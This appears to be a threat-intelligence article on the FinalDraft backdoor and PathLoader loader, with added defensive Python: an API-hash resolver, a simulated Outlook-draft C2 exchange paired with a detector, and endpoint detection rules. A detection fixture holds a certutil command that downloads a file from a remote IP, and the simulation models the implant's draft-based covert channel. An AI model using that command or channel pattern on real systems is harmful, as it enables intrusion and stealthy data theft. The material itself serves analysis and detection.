New Family of Data-Stealing Malware Exploits Microsoft Outlook for Command and Control
Watch for the Signs
A new family of data-stealing malware has been discovered that uses Microsoft Outlook as a command and control channel by abusing the Microsoft Graph API, and that carries a pass-the-hash capability for reusing stolen NTLM password hashes. The malware, attributed to an as-yet unnamed group, has been used against the foreign ministry of a South American nation, as well as a university and telecommunications providers in Southeast Asia.
Campaign Details
The campaign against the South American country may have started in November 2024, when Elastic Security detected a tight cluster of endpoint behavioral alerts within the country's Foreign Ministry. The initial access vector is unclear, but once inside the operators relied on living-off-the-land techniques, including using Windows' built-in certutil utility to download files.
Malware Components
The main components used by the attacker are a loader and a backdoor. The loader, named PathLoader, is a lightweight Windows executable that downloads and executes encrypted shellcode hosted on a remote server. It delays its own execution so that it does not detonate immediately in a target organization's sandbox, and it hinders static analysis with API hashing and string encryption: imported functions are resolved at runtime from hash values rather than plaintext names, and strings are decrypted only when needed, so neither shows up in a strings dump or an import table.
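API hashing is the loader's way of hiding which Windows functions it calls; the analyst's counter is to pre-hash the export names of common DLLs and look the loader's constants up in that table. The following is an added example of that resolver, not Elastic's code or the malware's. The page does not say which hash PathLoader uses, so the rotate-right-13-and-add (ROR13) routine below is an assumed stand-in (it is the classic shellcode convention); the rotation and seed are parameters because real loaders tweak them to defeat public tables, and the list of export names is a constructed subset of what a real run would take from the DLL export tables.

```python
"""Resolve API hashes back to export names (added example; ROR13 is an
assumed stand-in for whatever hash the loader actually uses)."""

# Constructed subset of export names; a real triage pre-hashes the full
# export tables of kernel32, ntdll, wininet, winhttp, advapi32, etc.
CANDIDATE_APIS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateThread", "WriteProcessMemory", "CreateRemoteThread",
    "InternetOpenA", "InternetOpenUrlA", "WinHttpOpen", "CryptDecrypt",
    "Sleep", "GetTickCount",
]


def ror_hash(name: bytes, rot: int = 13, seed: int = 0, bits: int = 32) -> int:
    """Rotate-right-and-add hash over the bytes of an export name.

    rot=13, seed=0 is the classic ROR13; both are parameters because
    loaders change them to break precomputed tables.
    """
    mask = (1 << bits) - 1
    h = seed
    for b in name:
        h = ((h >> rot) | (h << (bits - rot))) & mask   # rotate right by rot
        h = (h + b) & mask                              # add the next byte
    return h


def build_table(names, rot=13, seed=0):
    """Map hash value -> export name for every candidate name."""
    return {ror_hash(n.encode("ascii"), rot, seed): n for n in names}


def resolve_hashes(hashes, table):
    """Return {hash: name or None} for each hash pulled from a sample."""
    return {h: table.get(h) for h in hashes}


if __name__ == "__main__":
    table = build_table(CANDIDATE_APIS)
    # Constructed: constants as they might appear as immediates in the loader.
    sample_hashes = [ror_hash(b"VirtualAlloc"), ror_hash(b"CreateThread"), 0xDEADBEEF]
    for h, name in resolve_hashes(sample_hashes, table).items():
        print(f"0x{h:08x} -> {name or '<unresolved>'}")
```

If every constant stays unresolved, the sample is using a different rotation, seed or algorithm; recover the routine from the disassembly, change the parameters, and rebuild the table before assuming the names are unknown.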
The backdoor, named FinalDraft, is 64-bit malware written in C++ that focuses on data exfiltration and process injection. It carries several modules that it injects into other processes, and their output is forwarded to a command and control (C2) server. Initial reconnaissance gathers the computer name, account username, internal and external IP addresses, and details of running processes. FinalDraft also includes a pass-the-hash toolkit, similar to Mimikatz, for authenticating with stolen NTLM hashes without needing the plaintext password.
Outlook-based Command and Control
One of the backdoor's C2 channels is the Outlook mail service, reached through the Microsoft Graph API, which lets applications access resources hosted on Microsoft cloud services, including Microsoft 365 mailboxes. The API requires an OAuth access token; FinalDraft obtains a valid Graph API token and reuses it for its traffic. According to Elastic Security's analysis, commands and results are exchanged as draft messages in the mailbox rather than as sent mail, so nothing leaves the tenant as an email and the traffic blends in with legitimate Microsoft 365 use: from the network's point of view it is just a client talking to graph.microsoft.com over HTTPS.
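To make the channel concrete, and to show what it leaves behind, here is an added example that models both sides of a mailbox-draft C2 exchange and then runs a detector over the resulting mailbox audit events. It is not Elastic's code or the malware's: the in-memory MockMailbox stands in for the Graph calls an implant would make (GET and POST on /me/mailFolders/drafts/messages, DELETE on /me/messages/{id}), and the subject prefixes, session id, command handlers and simplified audit-record shape are all assumptions chosen for illustration.

```python
"""Mailbox-draft C2 model plus a draft-churn detector (added example; the
mailbox, subject prefixes and audit format are illustrative assumptions)."""
from dataclasses import dataclass
import itertools

CMD_PREFIX = "r_"    # assumed: operator -> implant command drafts
RESP_PREFIX = "p_"   # assumed: implant -> operator response drafts


@dataclass
class Draft:
    id: str
    subject: str
    body: str


class MockMailbox:
    """In-memory drafts folder with a simulated clock. Every operation is
    appended to `audit` as a simplified mailbox audit record."""

    def __init__(self):
        self.drafts: dict = {}
        self.audit: list = []
        self._ids = itertools.count(1)
        self.clock = 0  # seconds

    def _log(self, op, actor, draft):
        self.audit.append({"t": self.clock, "op": op, "actor": actor,
                           "id": draft.id, "subject": draft.subject})

    def create_draft(self, subject, body, actor):
        d = Draft(f"msg{next(self._ids)}", subject, body)
        self.drafts[d.id] = d
        self._log("Create", actor, d)
        return d

    def list_drafts(self, actor):
        return list(self.drafts.values())

    def delete_draft(self, draft_id, actor):
        self._log("Delete", actor, self.drafts.pop(draft_id))

    def send_draft(self, draft_id, actor):
        self._log("Send", actor, self.drafts.pop(draft_id))


# Constructed, harmless stand-ins for the commands an implant would run.
HANDLERS = {"hostname": lambda: "WS-01", "whoami": lambda: "CORP\\alice"}


def operator_task(mbox, session, command):
    """Operator side: a command is a draft whose subject is r_<session>."""
    return mbox.create_draft(f"{CMD_PREFIX}{session}", command, "operator").id


def implant_poll(mbox, session):
    """Implant side: run each r_<session> draft, answer in a p_<session>
    draft, then delete the command so the mailbox looks untouched."""
    ran = []
    for d in mbox.list_drafts("implant"):
        if d.subject == f"{CMD_PREFIX}{session}":
            out = HANDLERS.get(d.body.strip(), lambda: "unknown command")()
            mbox.create_draft(f"{RESP_PREFIX}{session}", out, "implant")
            mbox.delete_draft(d.id, "implant")
            ran.append(d.body.strip())
    return ran


def operator_collect(mbox, session):
    """Operator side: read and delete the p_<session> responses."""
    out = []
    for d in mbox.list_drafts("operator"):
        if d.subject == f"{RESP_PREFIX}{session}":
            out.append(d.body)
            mbox.delete_draft(d.id, "operator")
    return out


def draft_churn_subjects(audit, max_lifetime=300, min_cycles=2):
    """Subjects whose drafts are repeatedly created and deleted within
    max_lifetime seconds without ever being sent. A person's drafts are
    sent or linger; short create/delete cycles on a recurring subject are
    the channel's footprint."""
    open_drafts, cycles = {}, {}
    for ev in audit:
        if ev["op"] == "Create":
            open_drafts[ev["id"]] = ev
        elif ev["op"] == "Send":
            open_drafts.pop(ev["id"], None)
        elif ev["op"] == "Delete" and ev["id"] in open_drafts:
            created = open_drafts.pop(ev["id"])
            if ev["t"] - created["t"] <= max_lifetime:
                cycles[created["subject"]] = cycles.get(created["subject"], 0) + 1
    return sorted(s for s, n in cycles.items() if n >= min_cycles)


def simulate():
    """Two command/response rounds plus one legitimate draft that gets sent."""
    mbox, session, results = MockMailbox(), "s1", []
    for cmd in ("hostname", "whoami"):
        operator_task(mbox, session, cmd)
        mbox.clock += 30            # implant polls every half-minute
        implant_poll(mbox, session)
        mbox.clock += 30
        results += operator_collect(mbox, session)
    d = mbox.create_draft("Lunch on Friday?", "12:30?", "alice")
    mbox.clock += 60
    mbox.send_draft(d.id, "alice")  # benign: written, then sent
    return results, draft_churn_subjects(mbox.audit)


if __name__ == "__main__":
    print(simulate())
```

The detector keys on the one thing the channel cannot avoid: drafts that appear and disappear without a send. In a real tenant the equivalent signal is mailbox audit logging (draft create and delete events on the same subject from a non-interactive client), which is why enabling that logging, and alerting on Graph mail access from unfamiliar application registrations, matters more here than network indicators.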
Additional Features
FinalDraft can also:
- Open a TCP listener after adding a Windows Firewall rule to allow it; the rule is removed when the listener shuts down.
- Delete files, first overwriting their contents with zeros so that the data cannot be recovered by IT. Note that this defeats recovery of the file's contents, not of filesystem metadata: NTFS MFT entries and the USN change journal may still record the file's name, size and timestamps.
Detection Rules
Elastic Security has published YARA rules to help defenders detect PathLoader and FinalDraft on Windows, as well as FinalDraft on Linux. These rules are available on GitHub.
Conclusion
This new family of data-stealing malware poses a significant threat to organizations, as it uses a well-engineered, highly capable, and novel intrusion set to target sensitive information. CISOs and their detection teams should watch for the signs of attack, including use of Windows Remote Management's remote shell plugin (WinrsHost.exe) to spawn commands, certutil fetching files from the internet, and Graph API traffic from processes that have no business using it.
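The living-off-the-land behaviour in the campaign section (certutil used to download files) and the signs listed above (WinrsHost.exe spawning commands, unexpected Graph API traffic) can all be checked from ordinary endpoint telemetry. The following is an added example of that detection logic, not Elastic's rules: it runs three checks over constructed, simplified events in the shape of Sysmon process-creation and network-connection records, and the allowlist of processes expected to talk to the Graph API is an assumption to be tuned per estate.

```python
"""Detect certutil downloads, WinRM remote-shell children and Graph API
traffic from unexpected processes (added example over constructed events)."""
import re

# Constructed, simplified events: 'pc' ~ Sysmon EID 1, 'net' ~ Sysmon EID 3.
# 203.0.113.10 is a documentation address, not a real indicator.
EVENTS = [
    {"type": "pc", "image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil -urlcache -split -f http://203.0.113.10/update.dat "
                r"C:\Users\Public\update.dat"},
    {"type": "pc", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\winrshost.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"type": "pc", "image": r"C:\Windows\System32\certutil.exe",       # benign use
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil -hashfile setup.msi SHA256"},
    {"type": "net", "image": r"C:\Users\Public\svchost.exe",            # not the real svchost path
     "dest": "graph.microsoft.com", "port": 443},
    {"type": "net", "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "dest": "graph.microsoft.com", "port": 443},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
GRAPH_HOSTS = {"graph.microsoft.com", "login.microsoftonline.com"}
# Assumed allowlist; real estates add their own line-of-business clients.
EXPECTED_GRAPH_CLIENTS = {"outlook.exe", "teams.exe", "ms-teams.exe",
                          "onedrive.exe", "msedge.exe", "chrome.exe"}


def basename(path):
    """Case-insensitive file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, process, detail) for every event that trips a rule."""
    hits = []
    for ev in events:
        if ev["type"] == "pc":
            img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
            # certutil is a legitimate tool; the download switch plus a URL is the tell.
            if img == "certutil.exe" and "urlcache" in cmd.lower() and URL_RE.search(cmd):
                hits.append(("certutil_download", img, cmd))
            # Anything spawned by the WinRM remote shell host ran via WinRM.
            if parent == "winrshost.exe":
                hits.append(("winrm_remote_shell", img, cmd))
        elif ev["type"] == "net":
            img = basename(ev["image"])
            if ev["dest"].lower() in GRAPH_HOSTS and img not in EXPECTED_GRAPH_CLIENTS:
                hits.append(("graph_api_unexpected_process", img, ev["dest"]))
    return hits


if __name__ == "__main__":
    for rule, proc, detail in detect(EVENTS):
        print(f"{rule:32} {proc:14} {detail}")
```

The Graph check is the weakest of the three on its own, because many legitimate applications use the API; treat it as context that raises the priority of a certutil or WinRM alert on the same host rather than as a standalone detection.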
FAQs
Q: What is the main purpose of the malware?
A: The main purpose of the malware is to steal sensitive information and exfiltrate it to a command and control server.
Q: How does the malware communicate?
A: The malware uses the Outlook mail service and the Microsoft Graph API to communicate with its command and control server.
Q: What are the components of the malware?
A: The malware consists of a loader and a backdoor: the loader is named PathLoader and the backdoor is named FinalDraft.
Q: How does the malware evade detection?
A: The PathLoader loader hinders static analysis with API hashing and string encryption, and delays its execution so that it does not detonate immediately in a sandbox. The FinalDraft backdoor hides its command and control traffic inside legitimate-looking Microsoft Graph API connections to Outlook.